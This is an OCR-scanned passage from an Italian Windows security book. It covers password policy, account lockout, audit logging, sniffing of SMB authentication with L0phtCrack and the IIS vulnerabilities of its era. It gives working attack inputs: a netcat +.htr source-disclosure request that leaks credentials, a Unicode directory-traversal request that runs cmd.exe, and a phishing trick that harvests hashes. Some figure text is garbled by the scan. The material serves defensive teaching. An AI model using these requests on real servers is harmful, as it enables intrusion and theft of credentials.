tare misure più tradizionali, per esempio il blocco degli account dopo un certo 
numero di tentativi di connessione falliti, o l'utilizzo di una politica di password 
inossidabili e la registrazione dei tentativi non andati a buon fine. Per fortuna, 
Microsoft mette a disposizione alcuni tool che consentono di attuare queste 
contromisure. 


Applicazione di un politica di password inossidabili 


Uno di questi strumenti è costituito dalla poltitica degli account di User Manager, 
definita in Policies/Account in NT4. La stessa funzionalità si trova in Criteri di prote- 
zione locali/Criteri account/Criterio password in Windows 2000 e versioni superio- 
ri. 


Politica di gestione degli account 


Il principale strumento disponibile per poter gestire la regolazione per la scelta dei 
nomi utente e delle password è User Manager, disponibile selezionando il menu 
Policies e la voce Account. Con questa funzionalità è possibile modificare la politica 
di gestione delle password (per esempio forzando la lunghezza minima della pass- 
word o la sua unicità). Potete anche decidere che il nome utente venga bloccato 
dopo un certo numero di tentativi di connessione falliti. La finestra Account Policy 
consente anche agli amministratori di disconnettere gli utenti quando le normali ore 
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di accesso al sistema sono scadute: questa impostazione consente di tenere lontano 
i golosi nottambuli dal barattolo di marmellata. La finestra di dialogo Account Policy 
di Windows NT4 è mostrata nella figura seguente. 


Account Policy 


Domain: — ACME 
- Password Restrictions — sti = 
|; Maximum Password Age SI Minimum Password Age -— 7 
| © Password Never Expires [ul pe Allow Changes Immediately | 
IO Expies Inf 42 {24 Days di Ca Vis dec LI Howe Î 
Maysrboiico etnia | 
il 
1 Minimum Password RI ——| | Password Uniqueness_---— va | 
le Permit Blank Password | | ® DoNotKeep Password History 
| 1 i]. Bic. Characters | | n lieti fire Passwords | 


Lockout after [4 E ba bad logon attempts 


Reset count after | 30 E] minutes 


+ Lockout Duration===------—- 
| © Forever (until admin unlocks] 
| 


 Forcibly disconnect remote users from server when logon hours expire 
9 isers must log on in order to change passwore 


Ancora una volta, chiunque intenda verificare la forza delle password mediante le 
tecniche manuali automatizzate illustrate in questo capitolo deve essere a cono- 
scenza di questa funzionalità di blocco degli account. 


Passfilt 


È possibile migliorare ulteriormente la politica di scelta delle password utilizzando 
la libreria DLL Passfilt, che viene installata insieme al Service Pack 2 di NT 4 e che 
può essere abilitata in base alle istruzioni riportate nell’articolo numero Q161990 di 
Microsoft Knowledge Base. 


PR Passfilt è installato di default sui sistemi Windows 2000 e successivi, ma non è 

Ro automaticamente abilitato. Per abilitarlo utilizzate gli strumenti secpol.msc 

O gpedit.msc, attivando Criteri di protezione locali/Criteri account/Criterio 
password. Le password devono essere conformi ai requisiti di conformità. 


La libreria Passfilt costringe ad adottare una politica delle password restrittiva, ga- 
rantendo così che nessun utente si impigrisca e che nessuna delle password riesca a 
essere elaborata dai vari programmi di cracking. In sostanza quando la libreria vie- 
ne installata e attivata, l'utente è costretto a scegliere password che siano lunghe al- 
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meno sei caratteri, che non siano equivalenti, nemmeno in parte, a un qualunque 
nome utente o nome proprio e che contengano caratteri appartenenti ad almeno tre 
delle categorie seguenti: 

e lettere maiuscole dell’alfabeto inglese (A, B, C, ... Z); 

e lettere minuscole dell'alfabeto inglese (a, b, c, ... Z); 

e numeriarabi (1, 2, 3, ... 0); 

e metacaratteri non alfanumerici (@, #, [, ] ecc.). 

La libreria Passfilt è fondamentale per chiunque voglia esere considerato un se- 
rio amministratore di sistema NT, ma non è in grado di risolvere completamente 
il problema: consigliamo vivamente di utilizzare la finestra Account Policy di- 
sponibile nell’applicazione per evadere questa limitazione e portare la lunghez- 
za minima della password a 7 caratteri. Discuteremo in seguito il motivo di que- 
sta scelta. 


In Windows NT 4 Passfilt agisce solo quando l'utente chiede di modifica- 
re la password. Gli amministratori possono ancora impostare password 
deboli ricorrendo al programma User Manager, aggirando così le condi- 
zioni imposte dall'attivazione della libreria (si veda l'articolo Q174075 
di KB). 


Soglia di blocco 


Probabilmente uno degli interventi più importanti da compiere per limitare gli attac- 
chi di identificazione delle password SMB consiste nel definire una soglia di blocco 
per gli account. Quando un utente raggiunge un certo numero di tentativi di con- 
nessione falliti, il suo account viene bloccato finché un amministratore non lo ripri- 
stina o trascorre un periodo di tempo di interdizione definito dall'amministratore 
stesso. Le soglie di blocco possono essere definite tramite l’User Manager di NT4 o 
in Criteri di protezione locali/Criteri accouni/Criterio di blocco account in Windows 
2000 e versioni successive. a 


La soglia di blocco non si applica all'account Administrator incorporato. 
Dovete utilizzare il tool passprop per configurare la soglia di blocco affin- 
ché venga applicata all'account Administrator locale. \ + 


passprop 


passprop è un tool del Resource Kit della famiglia NT che applica la soglia esistente 
di blocco account all’account Administrator incorporato. Come abbiamo già evi- 
denziato, l'utente Administrator è il trofeo più ambito che gli hacker possano con- 
quistare. Sfortunatamente l’utente Administrator (RID 500) non può essere bloccato 
di default dopo un certo numero di tentativi di accesso falliti. Questa peculiarità 
consente a eventuali intrusi informatici di tentare indefinitamente di accedere al si- 
stema utilizzando questo utente. passprop consente anche all’utente Administrator 
di applicare la regolazione del blocco dell’autenticazione degli utenti (l'utente Ad- 
ministrator può sempre essere sbloccato dalla console di sistema, per prevenire un 
possibile attacco di tipo Denial of Service). 

Per attivare il blocco dell'utente Administrator, installate l’intero pacchetto RK (oppure 
solamente il file passprop.exe, se pensate che l'installazione dell'intero Resource Kit 
non sia opportuna) e digitate il comando seguente dalla console di sistema: 


passprop /complex /adminlockout 


cdi e n I 
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Con l'opzione /noadminlockout è possibile disattivare il blocco dell'utente Admini- 
strator. 


P passprop, nonostante le apparenze, non funziona su Windows 2000 se 
Ù non è installato il Service Pack 2. 


Auditing e log 


Anche se avete attivato Passfilt o passprop, impedendo a eventuali intrusi di accedere 
ai vostri sistemi con il metodo della ripetizione dei tentativi di accesso, è comunque 
opportuno registrare i tentativi di connessione falliti utilizzando Policies Audit in User 
Manager di NT4 (anche queste impostazioni sono disponibili in Windows 2000 e ver- 
sioni successive tramite Criteri di protezione locali/Criteri locali/Criteri controllo). La Fi- 
gura 5.2 mostra la configurazione consigliata nel tool Security Policy per avere un .NET 
Server 2003 RC1 perfettamente protetto. Sebbene queste impostazioni producano log 
più ricchi di informazioni con un effetto relativamente modesto sulle prestazioni, con- 
sigliamo di effettuare alcune prove prima di adottarle in ambienti di produzione. 


f Impostazioni protezione locale 


Impostazioni protezione driffe 9 tao ea: 
© criteri account a [Controlla accesso agli oggetti 
E 08 Criterio password |8]Controlla accesso al servizio directory 


CD Criterio di blocco account -- ra eventi accesso atcount 


5-0 2] Controlla eventi di accesso 
Fi Gg] Controlla aventi di sistema 

#}-(9 Assegnazione diritti utente = 

53 (2 Opzioni di protezione Ri ontrola gestione degl account 
(8-©]) Criteri chiave pubblica 2a "A acciato processo | 
®-(QJ Criteri restrizione software [Contro uso dei privilegi 

- Criteri di protezione IP su computer locale [ÉI{] Modifica del criterio di controllo 
ufiiccsa -SSIURIA 


Figura 5.2 


Impostazioni di auditing consigliate per un server sicuro, configurate mediante 
lo snap-in Security Policy di NET Server 2003 RCI. 


È ovvio che l'attivazione dell’auditing degli eventi diventa inutile se nessun ammini- 
stratore analizza periodicamente gli eventi registrati nei log per cercare tracce di tenta- 
tivi di intrusione. Un log della sicurezza (Security Log) con una serie di eventi 529 0 539 
Logon/Logoff (che indicano rispettivamente tentativi falliti di logon o logoff e il blocco 
del nome utente) è un sintomo sicuro del fatto che il vostro sistema è sottoposto a un 
attacco automatizzato. Dalla lettura del log diventa anche possibile nella maggior parte 
dei casi identificare la provenienza dell'attacco. Sfortunatamente la registrazione della 
famiglia NT non notifica l'indirizzo IP del sistema che sferra l'attacco, ma solo il nome 
NetBIOS. Ovviamente i nomi NetBIOS possono essere falsificati con facilità, quindi 
cambiare appositamente il nome NetBIOS è pura follia. In realtà, il prodotto SMBGrind 
di NAI falsifica il nome NetBIOS e può essere alterato facilmente con un semplice esa- 
decimale binario quale UltraEdit. Corre voce che in.NET Server 2003 verrà registrato 
l'indirizzo IP dei sistemi dell’intruso nel caso di tentativi di connessione falliti. 

La Figura 5.3 mostra il Security Log dopo una lunga serie di tentativi di accesso falliti, 
realizzati con NAT. 
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: Event Viewer - Security Log on \MACMEPDC1 


9:14:13 AM Security Logon/Logoft SYSTEM ACMEPDCI 
9:14:06 AM Security Lagon/Logott SYSTEM ACMEPDCI 
9:13:57 AM Security Logon/Logott SYSTEM ACMEPDCI 
93:13:13 AM Security Logon/Logott SYSTEM ACMEPDCI 
11:57:11 PM Security Logon/Logoff SYSTEM ACMEPDCI 
11:57:05 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:57:00 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:56:46 PM Security Logon/Lagoft SYSTEM ACMEPDCI 
11:56:41 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:56:35 PM Security Logonf/Logaft SYSTEM ACMEPDCI 
11:56:21 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:56:16 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:56:10 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:55:56 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:55:51 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:55:46 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:55:31 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:55:26 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:55:21 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:55:07 PM Security Logon/Lagaft SYSTEM ACMEPDCI 
11:55:01 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:54:56 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:54:39 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:54:34 PM Security Logon/Logoft SYSTEM ACMEPDCI 
11:54:29 PM Security Logon/Logott SYSTEM ACMEPDCI 
11:54:14 PM Security Logon/Logott SYSTEM ACMEPDCI , 


Figura 5.3 


Il Security Log di NT mostra i tentativi di logon falliti prodotti da un attacco basato sulla ricerca 
automatizzata della password, 


Di seguito è visibile in dettaglio la descrizione dell'evento 539. 
Date: 5/23/99 EventD: 539 
Time: 9:14:16 AM Source: Security 


User = NT AUTHORITY\SYSTE Type: Failure Audit 
Category: Logon/Logoff 


Authentication Package 
IMICROSOFT_AUTHENTICATION_PACKAGE_V1_0 
Workstation Name: \\MICHAEL 
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Naturalmente l’attivazione dell’auditing non è sufficiente se nessuno analizza perio- 
dicamente i log. Sappiamo che la consultazione manuale degli eventi può anche es- 
sere onerosa, ma fortunatamente l’utility Event Viewer è in grado di filtrare gli even- 
ti elencati utilizzando i parametri data, tipo, fonte dell'evento, categoria, utente, si- 
stema e ID dell’evento. 

Se avete la necessità di uno strumento affidabile e programmabile per gestire e ana- 
lizzare i log di sistema, procuratevi dumpel di RK. L'utility dumpel è in grado di ge- 
stire i log presenti su server remoti (ovviamente se sono concesse le autorizzazioni 
appropriate) ed è in grado di filtrare da uno a dieci tipi di eventi contemporanea- 
mente. Con dumpel, per esempio, è possibile estrarre da un server remoto tutti gli 
eventi corrispondenti a tentativi di accesso al sistema falliti (a cui viene attribuito un 
ID 529) e trasportarli sulla postazione locale con il comando seguente: 


C:\> dumpel -e 529 -f seclog.txt -1 security -m Security -t 


Un altro ottimo strumento è DumpEvt di Somarsoft (disponibile gratuitamente all’in- 
dirizzo http://www. somarsoft.com). DumpEvt è in grado di accedere all’intero log 
della sicurezza del sistema, trasformandolo in un formato adatto all'importazione in 
un database Access o SQL Server. Questo programma non è invece in grado di fil- 
trare specifiche tipologie di evento di sistema. 

Un altro valido tool gratuito è EventCombNT, incluso in Windows 2000 Server Security 
Operations Guide di Microsoft, e disponibile all'indirizzo http: //ww.microsoft.com/ 
technet/security/prodtech/windows/windows2000/staysecure/dfault.asp. 
EventCombNT è un tool multithread in grado di effettuare contemporaneamente il par- 
sing di log degli eventi di molti server pet determinati ID di eventi, tipi di eventi, origini 
di eventi e così via. Tutti i server devono essere membri di un dominio, poiché Event- 
CombNT funziona solo connettendosi inizialmente a un dominio. 

Tra i tool commerciali, consigliamo ELM Log Manager di .TNT Software, dispo- 
nibile all'indirizzo http://ww.tntsoftware.com. ELM consente di effettuare il 
monitoraggio dei log degli eventi con relativa notifica in tempo reale e a livello 
centralizzato su tutte le versioni della famiglia NT, inoltre assicura la compatibi- 
lità con Syslog e SNMP per sistemi non Windows. Anche se non l'abbiamo utiliz- 
zato personalmente, abbiamo raccolto pareri molto positivi su di esso presso 
clienti, 


Attivazione di allarmi in tempo reale: individuazione delle intrusioni 


La prossima frontiera nelle applicazioni di analisi dei log della sicurezza è rappre- 
sentata dalla capacità di attivazione di allarmi in tempo reale. Le applicazioni per 
Windows NT che svolgono le cosiddette “funzioni di individuazione delle intrusio- 
ni”. sono elencate nella Tabella 5.2. 

Nella Tabella 5.2 abbiamo illustrato prevalentemente i sistemi di intercettazione del- 
le intrusioni basati su host Windows; tuttavia molti dei fornitori elencati in questa ta- 
bella offrono anche altri prodotti di vari tipi: tool per l’analisi dei log e per l’emissio- 
ne di avvisi, sistemi di monitoraggio degli attacchi ai protocolli delle reti ecc.; per- 
tanto ponete domande precise ai fornitori sulle possibilità e sulle funzioni dei pro- 
dotti di vostro interesse. 

Una discussione approfondita sull’intercettazione delle intrusioni esula purtrop- 
po dagli obiettivi di questo libro; tuttavia gli amministratori attenti alla sicurezza 
dovranno seguire l'evoluzione di questa tecnologia. Che cosa può essere più 
importante di un allarme antifurto per la vostra rete di sistemi della famiglia NT? 
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Tabella 5.2 Strumenti per l'intercettazione degli intrusi in ambiente NT/2000 


BlackICE Pro Internet Secuirity Systems 
http://blackice.net/ 

Centrax Cybersafe Corp. 
http://ww.cybersafe.com/ 

Entercept Entercept Security Technologies 
http://entercept.com/ 

eTrust Intrusion Detection CA (Computer Associates) 
http://ww3.ca.com/Solutions/Product.asp?ID=163 

Intact Pedestal Software 
http://pedestalsoftware.com/ 

ITA (Intruder Alert) Symantec 


http://enterprisesecurity.symantec.com/products 


RealSecure Server Protection Internet Security System 
http://ww.iss.net 

Tripwire for NT Tripwire, Inc. 
http://ww.tripwiresecurity.com/ 


Una discussione approfondita dei metodi di rilevazione delle intrusioni non rientra 
negli obiettivi di questo libro. Gli amministratori di sistema dovrebbero tuttavia te- 
nersi costantemente sui nuovi prodotti: che cosa vi può essere di più importante di 
uno strumento in grado di lanciare un allarme ogni volta che avviene un tentativo 
d’intrusione? 


C) Intercettazione del traffico di autenticazione di rete 


Diffusione: 6 
Semplicità: 4 
Impatto: 9 
Fattore di rischio: 6 


La ricerca della password è un lavoro gravoso. Perché dunque non intercettare le 
credenziali direttamente dal cavo quando gli utenti eseguono la connessione al ser- 
ver e, semplicemente, replicarle per ottenere l’accesso al sistema obiettivo? 
Nell'’eventualità, comunque improbabile, che un hacker sia in grado di intercettare 
il traffico di autenticazione verso un server Windows NT, questo approccio può ri- 
sparmiare un numero notevole di tentativi di indovinare la password a caso. Qualsi- 
asi vecchio sniffer è in grado di eseguire questa operazione; al giorno d'oggi esisto- 
no tuttavia alcuni strumenti specifici progettati per questo scopo. Uno dei tanti stru- 
menti che avremo l’occasione di illustrare in questo capitolo è LOphtCrack, disponi- 
bile all'indirizzo http://ww.atstake.com/research/lc/index.html (il nome del 
programma contiene, casualmente, la cifra zero). 


N &stake, nelle versioni recenti, si riferisce a LOpbtCrack con la sigla “LC"; al 
RO momento della stesura di questo volume, la versione più recente è la LC4. 


LOphtCrack è uno strumento di ricerca delle password per server della famiglia Win- 
dows NT, che generalmente viene eseguito offline, elaborando una lista di hash di 
password per Windows NT, precedentemente intercettate. In questo modo si evita la 
possibilità di bloccare i nomi utente e la ricerca di una password corretta può pra- 
ticamente procedere all'infinito. Risalire a un file di hash di password non è tuttavia 
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un'impresa semplice. (Questa operazione verrà esaminata nel prosieguo di questo ca- 
pitolo nel paragrafo “Cracking delle password”, insieme al programma LOphtCrack.) 
LOphtCrack contiene anche una funzione chiamata “SMB Packet Capture” (nelle 
versioni precedenti questa funzione costituiva un'’utility a parte, chiamata readsmb), 
che elimina la necessità di ottenere dal sistema Windows NT il database delle pass- 
word. SMB Packet Capture resta in ascolto sul segmento di rete locale al quale può 
accedere ed è in grado di intercettare e catturare le singole sessioni di autenticazio- 
ne tra sistemi Windows NT, estraendone le informazioni cifrate che possono essere 
utilizzate per risalire alle password, e le importa successivamente nel programma 
principale di LOphtCrack per l’analisi. La Figura 5.4 mostra SMB Packet Capture al 
lavoro, mentre cattura password in transito sulla rete locale, di cui verrà successiva- 
mente effettuato il cracking mediante LOphtCrack. 


B Packet Capture Output 


E-TS\A... 669576. 
STRATOSPHERE-TS\phil f53645... 
NT4DOM\admin Baa732.. 
STRATOSPHERE-TS\s... 44ddb8.. 
STRATOSPHERE-TS\test  8177d9.. 
NT4DOM\Administrator bb9c33... 
NTA4DOM\Administrator 417588. 
NT4DOM\Administrator 2038bb... 
NTA4DOM\Administrator 27c7f5... vi 
STRATOSPHERE-TS\jo... a93143.. 1475c3818c! 
STRATOSPHERE-TS%bart 166525. d37a1da597 


Figura 5.4 


L'utility SMB Packet Capture, fornita insieme a LOphtCrack, è in grado di restare in ascolto sulla rete 
e di intercettare le sessioni di autenticazione a Windows NT. | risultati raccolti possono essere restituiti 
al programma LOphtCrack per il processo vero e proprio di crack. 


Alcuni lettori potrebbero a questo punto chiedersi se Windows NT utilizza il mMeto- 
do d’'autenticazione basato sul protocollo challenge/response. La risposta è sì. Du- 
rante la procedura di autenticazione, il server invia ai client un challenge (sfida), 
che viene in seguito cifrato utilizzando come chiave l’hash della password dell’uten- 
te e restituito al server via cavo, Quindi, il server esegue la cifratura del challenge 
utilizzando la sua copia dell’hash dell'utente e confronta i due valori. Se coincido- 
no, l'utente è autenticato (si veda l'articolo 0702776 di Microsoft Knowledge Base). 
Se l'hash di password dell’utente non attraversa mai la rete, come può riuscire l’uti- 
lity SMB Packet Capture di LOpht a intercettarlo? 

Semplicemente ricorrendo a un attacco di tipo forza bruta. Dal pacchetto catturato, 
LOphtCrack ricava unicamente il challenge e l’hash dell'utente cifrato utilizzando il 
challenge. Eseguendo la cifratura del valore conosciuto del challenge con strighe 
casuali e confrontando il risultato con l’hash cifrato, LOphtCrack è in grado di risalire 
al valore effettivo dell’hash stesso. A causa delle debolezze dell'algoritmo di hash 
LanManager, questo confronto richiede molto meno tempo del previsto, Il motivo 
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principale di questo risparmio di tempo risiede nella segmentazione dell’hash LM in 
tre parti attaccabili separatamente; questo consente di sferrare contemporaneamen- 
te l'attacco su diverse porzioni più piccole dell’hash anziché contro l’intero valore. 
Il grado di efficacia del reverse-engineering utilizzato nella cattura SMB abbinato al 
motore principale di cracking delle password di LOphtCrack è tale che chiunque 
avrà la possibilità di rimanere in ascolto sul segmento di rete per un periodo pro- 
lungato di tempo (operazione chiamata sniffing), quasi sicuramente sarà un grado 
di ottenere le credenziali dell’utente Administrator nel giro di pochi giorni. Adesso 
sentite, per caso, il ticchettio del conto alla rovescia prima che la vostra rete venga 
invasa da un’orda di hacker? 
Non siate troppo sicuri che la vostra rete, opportunamente munita di dispositivi di 
switch, possa essere immune dal pericolo rappresentato dall’intercettazione delle 
password in transito. Gli hacker possono ricorrere a un'ampia gamma di tecniche di 
falsificazione ARP per redirezionare a se stessi tutto il vostro traffico, effettuandone 
in tal modo lo sniffing; oppure, più semplicemente, possono giocarvi qualche altro 
scherzo, come quello citato come esempio e disponibile nelle FAQ del sito di 
LophtCrack: 
“Inviate un'e-mail al sistema obiettivo dell'attacco, sia che si tratti di una po- 
stazione privata o di una rete aziendale. Includete nel messaggio un URL 
nella forma seguente: file://nomevostrocomputer/condivisione/mes- 
saggio.html. Chiunque faccia clic sul collegamento, spedirà l’hash della 
propria password tentando l'autenticazione al vostro sistema.” 


il Capitolo 9), le reti commutate non forniscono grande protezione contro i 


Considerando l’esistenza di tecniche come il reindirizzamento ARP (si veda 
LI tentativi di intercettazione. 


Queste teste calde del gruppo LOpht hanno anche preparato uno sniffer per inter- 
cettare gli hash delle password di NT, durante le sessioni di autenticazione avviate 
con il protocollo PPTP (Point to Point Tunneling Protocol). Windows NT è in grado 
di utilizzare una versione adattata del protocollo PPTP per realizzare le connessioni 
in tecnologia VPN (Virtual Private Networking), un metodo per rendere sicuro il 
traffico di connessione sulla rete Internet. Sono disponibili due versioni dello sniffer 
PPTP all'indirizzo http://ww.packetstormsecurity.com/sniffers/pptp-sniff 
.tar.gz. Nella stessa pagina è disponibile anche la versione UNIX di readsmb, rea- 
lizzata da Jose Chung di Basement Research. 


[ER // tool SMB Capture può catturare unicamente connessioni riguardanti 
Ro macchine Win9x/Me e NT4 0 precedenti, che inviano la risposta LM. L’au- 
tenticazione tra macchine con Windows 2000 o una versione successiva 
non è vulnerabile a questo attacco (a meno che nello scambio non sia coin- 
volto un sistema Win9x/Me e/o NT4 0 versione precedente che invia l’ash 

LIM?) 


© Contromisura: disabilitazione dell’algoritmo 
di autenticazione LanManager 


La soluzione per bloccare questo tipo di attacchi consiste nel disabilitare l'autentica- 
zione LanMan. Ricordate che la risposta LM è lo strumento utilizzato dalla cattura di 
pacchetti SMB per ricavare le password. Se siete in grado di impedire che la risposta 
LM attraversi la rete, avrete bloccato in modo assoluto questo vettore di attacco. 
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Con la versione 4 del Service Pack di Windows NT, Microsoft ha aggiunto la possi- 
bilità di utilizzare una chiave nel Registro di sistema che impedisce al server NT di 
accettare autenticazioni di tipo LanManager. Aggiungete il valore LMCompatibili - 
tyLevel con un Value Type REG_DWORD=4 alla chiave seguente: 


HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA 


Value Type 4 impedirà a un controllore di dominio (domain controller) di accettare 
le richieste di autenticazione di tipo LanManager. L'articolo Q147706 di Microsoft 
Knowledge Base illustra l’utilizzo dei Livelli 4 e 5 per i controllori di dominio. 

Nei sistemi con Windows 2000 e versioni successive, questa impostazione del Regi- 
stro può essere configurata più facilmente utilizzando il tool Criteri di protezione lo- 
cali. Cercate l'impostazione “Protezione di rete: livello di autenticazione di LAN Ma- 
nager” in Criteri locali/Opzioni di protezione (questa impostazione è elencata sotto 
“Network Security: in Windows XP e versioni successive). Questa impostazione vi 
consente di configurare Windows 2000 e versioni successive affinché l’autenticazio- 
ne SMB sia effettuata in uno dei sei modi riportati in ordine crescente di sicurezza 
nell'articolo Q239869 del Knowledge Database. Vi consigliamo di non scegliere un 
livello di sicurezza inferiore al 2, “Serid NTLM Response Only”. 

Sfortunatamente tutti i client di livello inferiore che cercano di autenticarsi al con- 
trollore di dominio falliranno nel tentativo, poiché da questo momento in avanti 
vengono accettati solamente gli hash di tipo Windows NT (quando parliamo di “li- 
vello inferiore” ci riferiamo alle postazioni Windows 9x, Windows per Workgroup e 
client precedenti). Una conseguenza ancora più grave risiede nel fatto che qualun- 
que client non Windows NT, non essendo in grado di implementare l’hash NT, cer- 
cherà di inviare inutilmente gli hash LanManager trasmettendoli comunque attraver- 
so la rete e dando la possibilità a eventuali programmi in ascolto di intercettare i 
tentativi di connessione SMB. Pertanto questo fix ha un’utilità pratica limitata per la 
maggior parte delle aziende in cui si eseguono svariati tipi di client Windows. 


gn Occorre sottolineare che prima dell'uscita del Service Pack 4, Windows NT 
Ro accettava in ogni caso l'autenticazione, utilizzando l'hash di tipo LanMa- 

nager, per cui qualunque sistema NT poteva essere attaccato in questo mo- 
do. 


Con il rilascio di Windows 2000, Microsoft ha messo a disposizione un altro metodo 
per sostenere la trasmissione delle credenziali di autenticazione di Windows 9x sul 
cavo. È chiamato DSClient (Directory Services Client) ed è disponibile sul CD-ROM 
di Windows 2000 seguendo il percorso Clients\Win9x\Dsclient.exe. Gli utenti Win 
9x sono in teoria in grado di impostare il Registro di sistema in modo da utilizzare 
solo l’hash di Windows NT più sicuro. L'articolo Q239869 di Microsoft Knowledge 
Base spiega come installare DSClient e configurare i client Win 9x per utilizzare 
NTLM v2. 


Attacchi a IIS 


Quando Microsoft iniziò a installare IIS Unternet Information Services) di default 
con Windows 2000, fece la sua comparsa un genere interamente nuovo di attacchi. 
A partire da una successiva versione (.NET Server 2003 viene fornita con IIS 6), Mi- 
crosoft ha cominciato finalmente a disattivare l’IIS nelle sue installazioni di default. 
In effetti, l'installazione di default del sistema operativo non prevede nemmeno l’in- 
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stallazione di IIS e se scegliete di installarlo questo avviene con una configurazione 
ridotta al minimo. Quest'ultima decisione probabilmente gioverà alla sicurezza dei 
sistemi Windows più di qualsiasi altra patch rilasciata dopo il Service Pack 3 di NT4. 
Questa è purtroppo la realtà attuale, come dimostreremo in questo capitolo. Basti 
dire che se eseguirete IIS senza leggere questo paragrafo, probabilmente passeran- 
no solo pochi minuti prima che il vostro sistema diventi preda delle orde di vandali, 
hacker e worm automatizzati che al giorno d’oggi si aggirano minacciosi sul Web (e 
non pensate nemmeno che la vostra rete aziendale privata sia al sicuro: i worm HS 
continuano a circolare all’interno di molte aziende con cui siamo in contatto!). 
Abbiamo strutturato la nostra discussione sugli exploit IIS in base a tre principali 
vettori di attacchi: 


e divulgazione di informazioni; 
e attraversamento delle directory; 
e buffer overflow. 


Rimanderemo alla fine la nostra discussione sulle contromisure in modo da concen- 
trare tutte le prassi di sicurezza consigliate per l'IIS in un’unica parte del capitolo. 


® Divulgazione di informazioni 


Diffusione: 9 
Semplicità: 9 
Impatto: + 
Fattore di rischio: 8 


La prima categoria importante di vulnerabilità dell'IIS di cui discuteremo può a pri- 
ma vista sembrare tediosa, ma credeteci se diciamo che questa divulgazione di in- 
formazioni può portare a un numero di compromissioni pari a quello del famigera- 
to buffer overflow (di cui parleremo in questo paragrafo sull'IIS). 

Essenzialmente, qualsiasi baco faccia trapelare informazioni non destinate a un tipi- 
co utente può essere definito come problema di divulgazione di informazioni. La 
divulgazione di informazioni riguarda una vasta gamma di problemi, dalla divulga- 
zione del percorso alla rivelazione del codice sorgente. In questo paragrafo illustre- 
remo un problema molto comune, la divulgazione del codice sorgente di script 
Web dinamici, in grado di rivelare password e altri dati confidenziali. 

La vulnerabilità +.htr è un classico esempio di divulgazione di informazioni che 
minaccia VIIS 4 e 5, Se si accoda +.htr a una richiesta di file attiva, IIS 4 e 5 rivelano 
il codice sorgente di un file di script Web dinamico, anziché eseguire tale codice. 
Questo è un esempio di errore di interpretazione da parte di un'estensione ISAPI, 
ISM.DLL. L'estensione .htr provoca la mappatura dei file su ISM.DLL, che per errore 
rivela il sorgente del file. Un esempio di utilizzo di netcat allo scopo di sfruttare 
questa vulnerabilità (notate il +. htr accodato alla richiesta) è il seguente: 


C:\>nc -vv www.victim.com 80 

GET /sitei/global.asa+.htr HTTP/1.0 
[CRLF] 

[CRLF] 

www.victim.com [10.0.0.10] 80 (http) open 
HTTP/1.1 200 OK 

Server: Microsoft-IIS/5.0 

Date: Thu, 25 Jan 2001 90:50:17 GMT 
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<1-- filename = global.asa - -> 
("SQLConnectionString") = "DSN=sql;UID=sa;PWD=" 


("CustoConnectionString") = "DSN=Custo;UID= user;Password=simple" 
("ConnectionString") = "DSN=Company;UID=Company_user;PWD=guessme" 
("eMail pwd") = "sendaemon" 

("LDAPServer") = "LDAP://directory.Company.com:389" 

("LDAPUserID") = "cen=Directory Admin" 

("LDAPPwd") = "slapdme" 


Come potete vedere nell'esempio, il file global. asa, che generalmente non è invia- 
to al client, viene inoltrato quando alla richiesta viene accodato +. htr. Potete anche 
constatare che il team degli sviluppatori di questo particolare server ha commesso il 
classico errore di codificare quasi ogni password segreta dell’organizzazione all’in- 
terno del file global.asa. 


® Attraversamento delle directory 


Diffusione: 10 
Semplicità: 8 
Impatto: rd 
Fattore di rischio: 8 


Le vulnerabilità dagli effetti più devastanti per IIS 4 e 5 annunciate nella prima parte 
del 2001 sono state un paio di problemi relativi all’attraversamento delle directory 
(anche detti problemi di attraversamento del file system). Qualora siano anche stati 
commessi ulteriori errori di configurazione su un server vulnerabile, lo sfruttamento 
di questi punti deboli può portare a una completa compromissione del sistema. 

I due attacchi basati sull’attraversamento del file system che prenderemo in esame 
sono gli attacchi Unicode e Double Decode (talvolta chiamati di decodifica super- 
flua). Per prima cosa, spiegheremo come funzionano; successivamente illustreremo 
alcuni meccanismi che sfruttando l’accesso iniziale consentono di procedere alla 
conquista dell'intero sistema. 

L’exploit Unicode prevede l'invio di rappresentazioni Unicode overlong a due e a 
tre byte per la barra rovesciata (/) e la barra (\) a IIS in modo da consentire l'uscita 
dalle directory virtuali del Web e l’attraversamento della parte restante del disco. Le 
rappresentazioni Unicode overlong più utilizzate per la barra rovesciata (/) e la bar- 
ra (\) sono rispettivamente %c0%af e %c01%9c. Vi sono però altre rappresentazioni 
overlong. Apparentemente, IIS decodifica Unicode dopo aver verificato che il per- 
corso disponga di un’opportuna sicurezza. Pertanto, inviando all’IIS una richiesta 
HTTP simile alla seguente, sul server possono essere eseguiti comandi arbitrari: 


GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+'c:\' HTTP /1.0 


La rappresentazione Unicode overlong %c0%af consente di utilizzare il famigerato 
“punto-punto-barra” per retrocedere ed entrare nella directory del sistema e per for- 
nire un input alla shell dei comandi, la qual cosa normalmente è impossibile se si 
utilizzano solo caratteri ASCII. 

L'attacco Double Decode è molto simile. Scoperto nel maggio 2001 dai ricercatori di 
NSFocus, l'attacco Double Decode utilizza caratteri esadecimali a doppia codifica in 
luogo delle rappresentazioni Unicode overlong delle barre (/ e \}) per costruire richie- 
ste HTTP che eludono i normali controlli di sicurezza IIS e consentono di accedere a 
risorse situate all’esterno della root del Web. Per esempio, la barra rovesciata (\)può 
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essere rappresentata a un server Web mediante la notazione esadecimale %S5c. Analo- 
gamente, il carattere % viene rappresentato mediante %25. Pertanto, la stringa %255c, 
se viene decodificata due volte in sequenza, è convertita in una singola barra rove- 
sciata. Il concetto chiave è che occorrono due decodifiche e proprio questa è la natu- 
ra del problema riguardante l'IIS: esso effettua due decodifiche sulle richieste HTTP 
